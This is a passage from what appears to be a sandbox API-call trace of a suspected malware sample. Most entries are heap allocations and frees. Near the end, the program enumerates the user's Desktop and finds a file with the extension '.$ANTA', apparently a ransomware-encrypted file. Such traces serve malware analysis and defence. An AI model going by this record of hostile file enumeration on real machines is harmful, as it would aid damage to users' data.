(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0128.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0128.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0128.751] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0128.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0128.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0128.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0128.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0128.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0128.752] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.753] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.753] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0128.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0128.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.754] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.754] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.754] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0128.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.755] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0128.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.756] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0128.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0128.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.756] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x18d48f8f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x18d48f8f, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca568, cFileName=".", cAlternateFileName="")) returned 0x41ac600 [0128.757] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x18d48f8f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x18d48f8f, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca568, cFileName="..", cAlternateFileName="")) returned 1 [0128.757] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129d106e, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x129d106e, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x12a436af, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x24a0, dwReserved0=0x0, dwReserved1=0x43ca568, cFileName="0ocQBHc.xls.$ANTA", cAlternateFileName="0OCQBH~1.$AN")) returned 1 [0128.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0128.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.757] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0128.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0128.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.758] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0128.758] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0128.758] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, 